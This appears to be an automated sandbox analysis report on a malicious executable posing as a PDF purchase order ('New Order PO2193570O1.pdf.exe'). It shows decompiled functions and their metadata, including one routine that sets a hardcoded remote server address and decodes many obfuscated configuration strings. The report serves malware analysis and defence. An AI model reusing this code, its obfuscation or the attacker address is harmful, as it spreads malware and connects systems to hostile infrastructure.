                                                                                                                              • Associated: 00000000.00000002.202189588.000000000043A000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202210290.000000000043C000.00000002.00020000.sdmp Download File
                                                                                                                              Similarity
                                                                                                                              • API ID: InitializeMessageSendUninitialize
                                                                                                                              • String ID: |U
                                                                                                                              • API String ID: 2896919175-4034160414
                                                                                                                              • Opcode ID: 556d00a79d4960ff1ce6e89c465a7e0d9a54ac6e1d471b85b6eeaa2226694139
                                                                                                                              • Instruction ID: 3b1d1a5f3629fb090bd5a0ea86c798931cabf3c291590e76d9817694e46b8829
                                                                                                                              • Opcode Fuzzy Hash: 556d00a79d4960ff1ce6e89c465a7e0d9a54ac6e1d471b85b6eeaa2226694139
                                                                                                                              • Instruction Fuzzy Hash: BEF02477E00201AAD3206F68AD00B1B7774EF88302F06443AFE04722E1C77D89428B9D
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0040361A, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 100%
                                                                                                                              			E0040361A() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t8;

				_t8 =  *0x41f45c;
				_t3 = E004035FF(_t2, 0);
				if(_t8 != 0) {
					do {
						_t6 = _t8;
						_t8 =  *_t8;
						FreeLibrary( *(_t6 + 8));
						_t3 = GlobalFree(_t6);
					} while (_t8 != 0);
				}
				 *0x41f45c =  *0x41f45c & 0x00000000;
				return _t3;
			}







                                                                                                                              0x0040361b
                                                                                                                              0x00403623
                                                                                                                              0x0040362a
                                                                                                                              0x0040362d
                                                                                                                              0x0040362d
                                                                                                                              0x0040362f
                                                                                                                              0x00403634
                                                                                                                              0x0040363b
                                                                                                                              0x00403641
                                                                                                                              0x00403645
                                                                                                                              0x00403646
                                                                                                                              0x0040364e

                                                                                                                              APIs
                                                                                                                              • FreeLibrary.KERNEL32(?,"C:\Users\user\Desktop\New Order PO2193570O1.pdf.exe" ,00000000,74B5F560,004035F1,00000000,0040342D,00000000), ref: 00403634
                                                                                                                              • GlobalFree.KERNEL32 ref: 0040363B
                                                                                                                              Strings
                                                                                                                              • "C:\Users\user\Desktop\New Order PO2193570O1.pdf.exe" , xrefs: 0040362C
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.201984153.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.201978360.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.201994006.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202000566.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202075629.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202089293.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202121649.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202148009.000000000042F000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202159816.0000000000433000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202170813.0000000000437000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202189588.000000000043A000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202210290.000000000043C000.00000002.00020000.sdmp Download File
                                                                                                                              Similarity
                                                                                                                              • API ID: Free$GlobalLibrary
                                                                                                                              • String ID: "C:\Users\user\Desktop\New Order PO2193570O1.pdf.exe"
                                                                                                                              • API String ID: 1100898210-3508142455
                                                                                                                              • Opcode ID: 594683390acbace1feb38ee5af495b240e475f157c4d409b541952378f73dbd9
                                                                                                                              • Instruction ID: 07f203a12dc211ea1540440f4769086933c1ddaa55d0411da1bb29b7fd771b51
                                                                                                                              • Opcode Fuzzy Hash: 594683390acbace1feb38ee5af495b240e475f157c4d409b541952378f73dbd9
                                                                                                                              • Instruction Fuzzy Hash: 8FE08C32804420ABC6216F55EC0579A7768AB48B22F028536E900BB3A083743C464BDC
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 004056A0, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 100%
                                                                                                                              			E004056A0(char* _a4) {
				char* _t3;
				char* _t5;

				_t5 = _a4;
				_t3 =  &(_t5[lstrlenA(_t5)]);
				while( *_t3 != 0x5c) {
					_t3 = CharPrevA(_t5, _t3);
					if(_t3 > _t5) {
						continue;
					}
					break;
				}
				 *_t3 =  *_t3 & 0x00000000;
				return  &(_t3[1]);
			}





                                                                                                                              0x004056a1
                                                                                                                              0x004056ab
                                                                                                                              0x004056ad
                                                                                                                              0x004056b4
                                                                                                                              0x004056bc
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x004056bc
                                                                                                                              0x004056be
                                                                                                                              0x004056c3

                                                                                                                              APIs
                                                                                                                              • lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402CDE,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\New Order PO2193570O1.pdf.exe,C:\Users\user\Desktop\New Order PO2193570O1.pdf.exe,80000000,00000003), ref: 004056A6
                                                                                                                              • CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402CDE,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\New Order PO2193570O1.pdf.exe,C:\Users\user\Desktop\New Order PO2193570O1.pdf.exe,80000000,00000003), ref: 004056B4
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.201984153.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.201978360.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.201994006.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202000566.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202075629.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202089293.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202121649.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202148009.000000000042F000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202159816.0000000000433000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202170813.0000000000437000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202189588.000000000043A000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202210290.000000000043C000.00000002.00020000.sdmp Download File
                                                                                                                              Similarity
                                                                                                                              • API ID: CharPrevlstrlen
                                                                                                                              • String ID: C:\Users\user\Desktop
                                                                                                                              • API String ID: 2709904686-1669384263
                                                                                                                              • Opcode ID: 49376fbf8c9c30057c1bc985cc011eea510fd351d3a644e674ee9e82abf7fe19
                                                                                                                              • Instruction ID: 6658d1b0ab05e5211e75f0b74aef41c49d7b43cb9628f8e009f88ad9fa15a52a
                                                                                                                              • Opcode Fuzzy Hash: 49376fbf8c9c30057c1bc985cc011eea510fd351d3a644e674ee9e82abf7fe19
                                                                                                                              • Instruction Fuzzy Hash: C5D0A772409DB02EF30352108C04B8F7A98CF17300F0948A2E440E21D0C27C5C818FFD
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 709B10E0, Relevance: 5.1, APIs: 4, Instructions: 102memoryCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 100%
                                                                                                                              			E709B10E0(void* _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				char* _t17;
				char _t19;
				void* _t20;
				void* _t24;
				void* _t27;
				void* _t31;
				void* _t37;
				void* _t39;
				void* _t40;
				signed int _t43;
				void* _t52;
				char* _t53;
				char* _t55;
				void* _t56;
				void* _t58;

				 *0x709b405c = _a8;
				 *0x709b4060 = _a16;
				 *0x709b4064 = _a12;
				 *((intOrPtr*)(_a20 + 0xc))( *0x709b4038, E709B1556, _t52);
				_t43 =  *0x709b405c +  *0x709b405c * 4 << 2;
				_t17 = E709B123B();
				_a8 = _t17;
				_t53 = _t17;
				if( *_t17 == 0) {
					L16:
					return GlobalFree(_a8);
				} else {
					do {
						_t19 =  *_t53;
						_t55 = _t53 + 1;
						_t58 = _t19 - 0x6c;
						if(_t58 > 0) {
							_t20 = _t19 - 0x70;
							if(_t20 == 0) {
								L12:
								_t53 = _t55 + 1;
								_t24 = E709B1266(E709B12AD( *_t55 - 0x30));
								L13:
								GlobalFree(_t24);
								goto L14;
							}
							_t27 = _t20;
							if(_t27 == 0) {
								L10:
								_t53 = _t55 + 1;
								_t24 = E709B12D1( *_t55 - 0x30, E709B123B());
								goto L13;
							}
							L7:
							if(_t27 == 1) {
								_t31 = GlobalAlloc(0x40, _t43 + 4);
								 *_t31 =  *0x709b4030;
								 *0x709b4030 = _t31;
								E709B1508(_t31 + 4,  *0x709b4064, _t43);
								_t56 = _t56 + 0xc;
							}
							goto L14;
						}
						if(_t58 == 0) {
							L17:
							_t34 =  *0x709b4030;
							if( *0x709b4030 != 0) {
								E709B1508( *0x709b4064, _t34 + 4, _t43);
								_t37 =  *0x709b4030;
								_t56 = _t56 + 0xc;
								GlobalFree(_t37);
								 *0x709b4030 =  *_t37;
							}
							goto L14;
						}
						_t39 = _t19 - 0x4c;
						if(_t39 == 0) {
							goto L17;
						}
						_t40 = _t39 - 4;
						if(_t40 == 0) {
							 *_t55 =  *_t55 + 0xa;
							goto L12;
						}
						_t27 = _t40;
						if(_t27 == 0) {
							 *_t55 =  *_t55 + 0xa;
							goto L10;
						}
						goto L7;
						L14:
					} while ( *_t53 != 0);
					goto L16;
				}
			}


















                                                                                                                              0x709b10e7
                                                                                                                              0x709b10ef
                                                                                                                              0x709b1103
                                                                                                                              0x709b110b
                                                                                                                              0x709b1116
                                                                                                                              0x709b1119
                                                                                                                              0x709b1121
                                                                                                                              0x709b1124
                                                                                                                              0x709b1126
                                                                                                                              0x709b11c4
                                                                                                                              0x709b11d0
                                                                                                                              0x709b112c
                                                                                                                              0x709b112d
                                                                                                                              0x709b112d
                                                                                                                              0x709b1130
                                                                                                                              0x709b1131
                                                                                                                              0x709b1134
                                                                                                                              0x709b1203
                                                                                                                              0x709b1206
                                                                                                                              0x709b119e
                                                                                                                              0x709b11a4
                                                                                                                              0x709b11ac
                                                                                                                              0x709b11b1
                                                                                                                              0x709b11b4
                                                                                                                              0x00000000
                                                                                                                              0x709b11b4
                                                                                                                              0x709b1209
                                                                                                                              0x709b120a
                                                                                                                              0x709b1186
                                                                                                                              0x709b118c
                                                                                                                              0x709b1194
                                                                                                                              0x00000000
                                                                                                                              0x709b1194
                                                                                                                              0x709b1152
                                                                                                                              0x709b1153
                                                                                                                              0x709b115b
                                                                                                                              0x709b1168
                                                                                                                              0x709b1170
                                                                                                                              0x709b1179
                                                                                                                              0x709b117e
                                                                                                                              0x709b117e
                                                                                                                              0x00000000
                                                                                                                              0x709b1153
                                                                                                                              0x709b113a
                                                                                                                              0x709b11d1
                                                                                                                              0x709b11d1
                                                                                                                              0x709b11d8
                                                                                                                              0x709b11e5
                                                                                                                              0x709b11ea
                                                                                                                              0x709b11ef
                                                                                                                              0x709b11f5
                                                                                                                              0x709b11fb
                                                                                                                              0x709b11fb
                                                                                                                              0x00000000
                                                                                                                              0x709b11d8
                                                                                                                              0x709b1140
                                                                                                                              0x709b1143
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x709b1149
                                                                                                                              0x709b114c
                                                                                                                              0x709b119b
                                                                                                                              0x00000000
                                                                                                                              0x709b119b
                                                                                                                              0x709b114f
                                                                                                                              0x709b1150
                                                                                                                              0x709b1183
                                                                                                                              0x00000000
                                                                                                                              0x709b1183
                                                                                                                              0x00000000
                                                                                                                              0x709b11ba
                                                                                                                              0x709b11ba
                                                                                                                              0x00000000
                                                                                                                              0x709b11c3

                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.204153248.00000000709B1000.00000020.00020000.sdmp, Offset: 709B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.204144717.00000000709B0000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.204159626.00000000709B3000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.204167409.00000000709B5000.00000002.00020000.sdmp Download File
                                                                                                                              Similarity
                                                                                                                              • API ID: Global$Free$Alloc
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1780285237-0
                                                                                                                              • Opcode ID: cd15d3ea004846c48de1b6822f552e8c191d96db72360aa7bb70e21839615a4a
                                                                                                                              • Instruction ID: 2db59fc2fb5d62bc602533844469f6dfc9d25f1dba1a81b3dac88c84cf642c81
                                                                                                                              • Opcode Fuzzy Hash: cd15d3ea004846c48de1b6822f552e8c191d96db72360aa7bb70e21839615a4a
                                                                                                                              • Instruction Fuzzy Hash: C331B2B241C144EFD701AF69DD49B2E7FFEEB05270BA44229FA46D6320D678D800EB12
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 004057B2, Relevance: 5.0, APIs: 4, Instructions: 30stringCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 100%
                                                                                                                              			E004057B2(CHAR* _a4, CHAR* _a8) {
				int _t10;
				int _t15;
				CHAR* _t16;

				_t15 = lstrlenA(_a8);
				_t16 = _a4;
				while(lstrlenA(_t16) >= _t15) {
					 *(_t15 + _t16) =  *(_t15 + _t16) & 0x00000000;
					_t10 = lstrcmpiA(_t16, _a8);
					if(_t10 == 0) {
						return _t16;
					}
					_t16 = CharNextA(_t16);
				}
				return 0;
			}






                                                                                                                              0x004057be
                                                                                                                              0x004057c0
                                                                                                                              0x004057e8
                                                                                                                              0x004057cd
                                                                                                                              0x004057d2
                                                                                                                              0x004057dd
                                                                                                                              0x00000000
                                                                                                                              0x004057fa
                                                                                                                              0x004057e6
                                                                                                                              0x004057e6
                                                                                                                              0x00000000

                                                                                                                              APIs
                                                                                                                              • lstrlenA.KERNEL32(00000000,?,00000000,00000000,004059C0,00000000,[Rename],?,?,00000000,000000F1,?), ref: 004057B9
                                                                                                                              • lstrcmpiA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,004059C0,00000000,[Rename],?,?,00000000,000000F1,?), ref: 004057D2
                                                                                                                              • CharNextA.USER32(00000000,?,?,00000000,000000F1,?), ref: 004057E0
                                                                                                                              • lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,004059C0,00000000,[Rename],?,?,00000000,000000F1,?), ref: 004057E9
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.201984153.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.201978360.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.201994006.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202000566.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202075629.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202089293.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202121649.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202148009.000000000042F000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202159816.0000000000433000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202170813.0000000000437000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202189588.000000000043A000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202210290.000000000043C000.00000002.00020000.sdmp Download File
                                                                                                                              Similarity
                                                                                                                              • API ID: lstrlen$CharNextlstrcmpi
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 190613189-0
                                                                                                                              • Opcode ID: 0108cf067d6f6d80c8ed850288af8a4b3b9133f156f8bdff26d83f0dd252fb59
                                                                                                                              • Instruction ID: 042c172281cf084eebf1820456e7eb749b121a10276c912c68532230cfd8689c
                                                                                                                              • Opcode Fuzzy Hash: 0108cf067d6f6d80c8ed850288af8a4b3b9133f156f8bdff26d83f0dd252fb59
                                                                                                                              • Instruction Fuzzy Hash: BBF0A736249D51DBC2029B295C44E6FBEA4EF95355F14057EF440F3180D335AC11ABBB
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Analysis Process: New Order PO2193570O1.pdf.exe PID: 1124 Parent PID: 1004 New Order PO2193570O1.pdf.exeCOMMON

                                                                                                                              Executed Functions

                                                                                                                              Function 00423050, Relevance: 510.4, Strings: 407, Instructions: 1630COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 99%
                                                                                                                              			E00423050(intOrPtr __ecx) {
				intOrPtr _v8;
				intOrPtr _t2;
				intOrPtr _t26;
				intOrPtr _t65;
				intOrPtr _t179;
				intOrPtr _t206;
				intOrPtr _t212;
				intOrPtr _t315;
				intOrPtr _t362;
				intOrPtr _t382;
				intOrPtr _t405;
				void* _t406;
				void* _t408;
				void* _t409;
				void* _t815;

				_push(__ecx);
				_v8 = __ecx;
				 *0x432354 = "056139954853430408";
				_push("51.222.56.151/tsc/");
				_pop(_t2);
				 *0x4326d8 = _t2;
				 *0x4321d0 = E00422F70(_t406, _t408, _t409, _t815, "LQ==");
				 *0x432608 = E00422F70(_t406, _t408, _t409, _t815, "KaoQpEzKSjGm8Q==");
				 *0x432600 = E00422F70(_t406, _t408, _t409, _t815, "CaoQpEzKRGjzqA7oxsEfmfrFl/2dONghOeYatRN8r22RvgdoQSz2oEl19dbLETI+8RVlqBE+g42Kng==");
				 *0x43236c = E00422F70(_t406, _t408, _t409, _t815, "DboNtEbQF3/+oFA=");
				 *0x432494 = E00422F70(_t406, _t408, _t409, _t815, "GLoX6gmCFw==");
				 *0x432694 = E00422F70(_t406, _t408, _t409, _t815, "D6AGohOHQTY=");
				 *0x432550 = E00422F70(_t406, _t408, _t409, _t815, "GbwOoFzTATf+y0KojtYSkaQ=");
				 *0x43214c = E00422F70(_t406, _t408, _t409, _t815, "CaoQpEzKRAm/60SwiotXjvfNyQ==");
				 *0x43248c = E00422F70(_t406, _t408, _t409, _t815, "F7JjuEDJAWWXwRnlzp8=");
				 *0x4321f8 = E00422F70(_t406, _t408, _t409, _t815, "HYYqlBOHQTY=");
				 *0x43242c = E00422F70(_t406, _t408, _t409, _t815, "HrwOsUDJRAu/6Eb/y8lB");
				 *0x432508 = E00422F70(_t406, _t408, _t409, _t815, "DbwRu07VCzCuvwPgmA==");
				 *0x4320a4 = E00422F70(_t406, _t408, _t409, _t815, "EbYaskbGFiH+yUKrjJlT07KbgPCVZg==");
				 *0x432564 = E00422F70(_t406, _t408, _t409, _t815, "ErIRtF7GFiD+qA7oxsEfmfrFl/2dONghOeYatRN8r22RvgdoQSz2oEl19dbLETI+8RVlqBE+g42Kng==");
				 *0x4325c8 = E00422F70(_t406, _t408, _t409, _t815, "CqEMs0zUFyqsvwPgmA==");
				 *0x432558 = E00422F70(_t406, _t408, _t409, _t815, "FrwEuUrGCGWu90ymjp9B26WbgPCVcQ==");
				 *0x43258c = E00422F70(_t406, _t408, _t409, _t815, "DLoHtUbEBTe6vwPgmA==");
				 *0x432104 = E00422F70(_t406, _t408, _t409, _t815, "HroQoEXGHX/+oFA=");
				 *0x4321cc = E00422F70(_t406, _t408, _t409, _t815, "CJIu6gmCFw==");
				 *0x43215c = E00422F70(_t406, _t408, _t409, _t815, "FrITpEbXXmX79g==");
				 *0x43228c = E00422F70(_t406, _t408, _t409, _t815, "DroOtQmKSWjzqA7oxsEfmfrFl/2dONghOeYatRN8r22RvgdoQSz2oEl19dbLETI+8RVlqBE+g42Kng==");
				 *0x432374 = E00422F70(_t406, _t408, _t409, _t815, "FrxjsUWdRGCt");
				 *0x432310 = E00422F70(_t406, _t408, _t409, _t815, "WrwNtROHQTY=");
				_t26 = E00422F70(_t406, _t408, _t409, _t815, "FLYXp0bVD2XzqA7oxsEfmfrFl/2dONghOeYatRN8r22RvgdoQSz2oEl19dbLETI+8RVlqBE+g42Kng=="); // executed
				 *0x432348 = _t26;
				 *0x432198 = E00422F70(_t406, _t408, _t409, _t815, "E4NZ8GD3Ww==");
				 *0x432538 = E00422F70(_t406, _t408, _t409, _t815, "GbwWvl3VHX/+xkywhZhAzeg=");
				 *0x4320d8 = E00422F70(_t406, _t408, _t409, _t815, "E70QpEjLCCC6pXCqjZhFxraa3/CdONghOeYatRN8r22RvgdoQSz2oEl19dbLETI+8RVlqBE+g42Kng==");
				 *0x4323a0 = E00422F70(_t406, _t408, _t409, _t815, "f6A/jAM=");
				 *0x4320a0 = E00422F70(_t406, _t408, _t409, _t815, "dA==");
				 *0x4322bc = E00422F70(_t406, _t408, _t409, _t815, "f6A/jAzU");
				 *0x432170 = E00422F70(_t406, _t408, _t409, _t815, "f6A=");
				 *0x432570 = E00422F70(_t406, _t408, _t409, _t815, "Gek/jHnVCyKs5E6BiphT6Is=");
				 *0x432404 = E00422F70(_t406, _t408, _t409, _t815, "dLYbtQ==");
				 *0x432254 = E00422F70(_t406, _t408, _t409, _t815, "YIkMvkyJLSG761esjYVXxg==");
				 *0x4326b8 = E00422F70(_t406, _t408, _t409, _t815, "AYkMvkzzFiSw9kWgmbES7riG35nUKMc=");
				 *0x432244 = E00422F70(_t406, _t408, _t409, _t815, "f6BM4QfNFCI=");
				 *0x432520 = E00422F70(_t406, _t408, _t409, _t815, "f6BM4gfNFCI=");
				 *0x43252c = E00422F70(_t406, _t408, _t409, _t815, "f6BM4wfNFCI=");
				 *0x4326e4 = E00422F70(_t406, _t408, _t409, _t815, "f6BM5AfNFCI=");
				 *0x43259c = E00422F70(_t406, _t408, _t409, _t815, "f6BM5QfNFCI=");
				 *0x43256c = E00422F70(_t406, _t408, _t409, _t815, "f6BM5gfNFCI=");
				 *0x432294 = E00422F70(_t406, _t408, _t409, _t815, "f6BM5wfNFCI=");
				 *0x432568 = E00422F70(_t406, _t408, _t409, _t815, "Gek/jHnVCyKs5E6BiphT6Iuby7zZYZA/Oq9b9A==");
				 *0x4322f0 = E00422F70(_t406, _t408, _t409, _t815, "Gek/jHnVCyKs5E6BiphT6IuOyLXVd5k/Oq9b9A==");
				 *0x432398 = E00422F70(_t406, _t408, _t409, _t815, "Gek/jHnVCyKs5E6BiphT6IuF1arXeYBpOq9b9A==");
				 *0x432458 = E00422F70(_t406, _t408, _t409, _t815, "Gek/jHnVCyKs5E6BiphT6IuFyabTZcQ4JOVT9FI=");
				 *0x432440 = E00422F70(_t406, _t408, _t409, _t815, "Gek/jHnVCyKs5E6BiphT6IuGyaODO5FgeA==");
				 *0x432618 = E00422F70(_t406, _t408, _t409, _t815, "Gek/jHnVCyKs5E6BiphT6Iub1bbEep5iJ+VT9FI=");
				 *0x4320f4 = E00422F70(_t406, _t408, _t409, _t815, "Gek/jHnVCyKs5E6BiphT6Iue2aLFe4Flea4GrA5/5izQ");
				 *0x4326f4 = E00422F70(_t406, _t408, _t409, _t815, "BfYQ/lPOFA==");
				 *0x4322e0 = E00422F70(_t406, _t408, _t409, _t815, "Bo9jv0bMDSCt");
				 *0x4322c4 = E00422F70(_t406, _t408, _t409, _t815, "Bo8CpV3IAiyy6Q==");
				 *0x4326a0 = E00422F70(_t406, _t408, _t409, _t815, "Bo9jsw==");
				 *0x4320e8 = E00422F70(_t406, _t408, _t409, _t815, "PLoPtQ==");
				 *0x4322e8 = E00422F70(_t406, _t408, _t409, _t815, "f6BMvUjOCmuu7VM=");
				 *0x43224c = E00422F70(_t406, _t408, _t409, _t815, "G4MzlGjzJQ==");
				 *0x4321c4 = E00422F70(_t406, _t408, _t409, _t815, "FpwgkWXmNBWaxHeE");
				 *0x4324ec = E00422F70(_t406, _t408, _t409, _t815, "D4Amgnn1KwOXyWY=");
				 *0x4326cc = E00422F70(_t406, _t408, _t409, _t815, "ELwLvm3IAQ==");
				 *0x4325d4 = E00422F70(_t406, _t408, _t409, _t815, "EpIv6X3v");
				 *0x4324bc = E00422F70(_t406, _t408, _t409, _t815, "KaIPuV3CV2u66U8=");
				 *0x43247c = E00422F70(_t406, _t408, _t409, _t815, "KaIPuV3CVxqx9Uar");
				_t65 = E00422F70(_t406, _t408, _t409, _t815, "KaIPuV3CVxqu90a1ip5X66Ha"); // executed
				 *0x432140 = _t65;
				 *0x432408 = E00422F70(_t406, _t408, _t409, _t815, "KaIPuV3CVxqt8Ua1");
				 *0x4323f0 = E00422F70(_t406, _t408, _t409, _t815, "KaIPuV3CVxq96k+whoJtwLKQzg==");
				 *0x43241c = E00422F70(_t406, _t408, _t409, _t815, "KaIPuV3CVxq47E2kh4VI0Q==");
				 *0x4325f4 = E00422F70(_t406, _t408, _t409, _t815, "KaIPuV3CVxq96Uy2jg==");
				 *0x43250c = E00422F70(_t406, _t408, _t409, _t815, "KaIPuV3CVxq96k+whoJt1q6c36M=");
				 *0x432650 = E00422F70(_t406, _t408, _t409, _t815, "KaIPuV3CVxq96k+whoJt1ruH2A==");
				 *0x4321f0 = E00422F70(_t406, _t408, _t409, _t815, "BvEMo3bEFjyu8X/n0ZdulrKG2aLJZYFpcJRc/UcNoHrgsQ==");
				 *0x4323bc = E00422F70(_t406, _t408, _t409, _t815, "BvEe");
				 *0x4320d4 = E00422F70(_t406, _t408, _t409, _t815, "CpI3mA==");
				 *0x432690 = E00422F70(_t406, _t408, _t409, _t815, "CpI3mBQ=");
				 *0x4322b8 = E00422F70(_t406, _t408, _t409, _t815, "FIAwj2DJDTE=");
				 *0x4325a8 = E00422F70(_t406, _t408, _t409, _t815, "FIAwj3rPETG66lSr");
				 *0x4321e4 = E00422F70(_t406, _t408, _t409, _t815, "CphS4XbgATGX61egmYJT2JyNw4PceoE=");
				 *0x432178 = E00422F70(_t406, _t408, _t409, _t815, "CphS4XbhFiC71k+qnw==");
				 *0x4326d4 = E00422F70(_t406, _t408, _t409, _t815, "CphS4XbmETG24E2xgo9TwLI=");
				 *0x432338 = E00422F70(_t406, _t408, _t409, _t815, "CphS4XrjNhqa4EC3kpxG");
				 *0x432504 = E00422F70(_t406, _t408, _t409, _t815, "LLIWvF3ECCzw4U+p");
				 *0x4322ec = E00422F70(_t406, _t408, _t409, _t815, "DLIWvF3oFCCw00Kwh5g=");
				 *0x4324a0 = E00422F70(_t406, _t408, _t409, _t815, "DLIWvF3kCCqt4HWknoBG");
				 *0x4324d4 = E00422F70(_t406, _t408, _t409, _t815, "DLIWvF3iCjCz4FGkn4l7wLKFyQ==");
				 *0x4323a8 = E00422F70(_t406, _t408, _t409, _t815, "DLIWvF3gATGX8Uao");
				 *0x4326ec = E00422F70(_t406, _t408, _t409, _t815, "DLIWvF3hFiC7");
				 *0x4325d0 = E00422F70(_t406, _t408, _t409, _t815, "KrIQo17IFiGtq1e9nw==");
				 *0x432188 = E00422F70(_t406, _t408, _t409, _t815, "O/g=");
				 *0x43264c = E00422F70(_t406, _t408, _t409, _t815, "KA==");
				 *0x4323c8 = E00422F70(_t406, _t408, _t409, _t815, "CoEslhOHMQuV");
				 *0x43239c = E00422F70(_t406, _t408, _t409, _t815, "CoEslhOHQTY=");
				 *0x4323b8 = E00422F70(_t406, _t408, _t409, _t815, "CZwlhBOHQTY=");
				 *0x432258 = E00422F70(_t406, _t408, _t409, _t815, "EpwwhBOHQTY=");
				 *0x4322b4 = E00422F70(_t406, _t408, _t409, _t815, "D4AmghOHQTY=");
				 *0x4321a4 = E00422F70(_t406, _t408, _t409, _t815, "CpIwgxOH");
				 *0x4326c4 = E00422F70(_t406, _t408, _t409, _t815, "CpIwgxOHQTY=");
				 *0x4324c4 = E00422F70(_t406, _t408, _t409, _t815, "f6A/jGTIHiyy6UKZt6pbxrKO1ajsSYV+e61e9FsirCnS+g==");
				 *0x4326f0 = E00422F70(_t406, _t408, _t409, _t815, "Bo8Pv07OCjbw71CqhQ==");
				 *0x4321b0 = E00422F70(_t406, _t408, _t409, _t815, "PLwRvXrSBii38XaXpw==");
				 *0x432394 = E00422F70(_t406, _t408, _t409, _t815, "L6AGokfGCSCY7Eapjw==");
				 *0x432548 = E00422F70(_t406, _t408, _t409, _t815, "P71jolDXECC60FCgmYJT2bI=");
				 *0x432544 = E00422F70(_t406, _t408, _t409, _t815, "P71jolDXECC61UK2mJtdxrM=");
				 *0x432664 = E00422F70(_t406, _t408, _t409, _t815, "PaYKtA==");
				 *0x432400 = E00422F70(_t406, _t408, _t409, _t815, "Bo8XtUTX");
				 *0x43220c = E00422F70(_t406, _t408, _t409, _t815, "ObwMu0DCFxmCoFCazp8cwK+c");
				 *0x4321f4 = E00422F70(_t406, _t408, _t409, _t815, "f6Bq9VquQTbXoFDMzp87kaThn6M=");
				 *0x432138 = E00422F70(_t406, _t408, _t409, _t815, "GZIxlBOHQTb+y2KIrtYSkaTI/pHkUM8sMbgYvU0=");
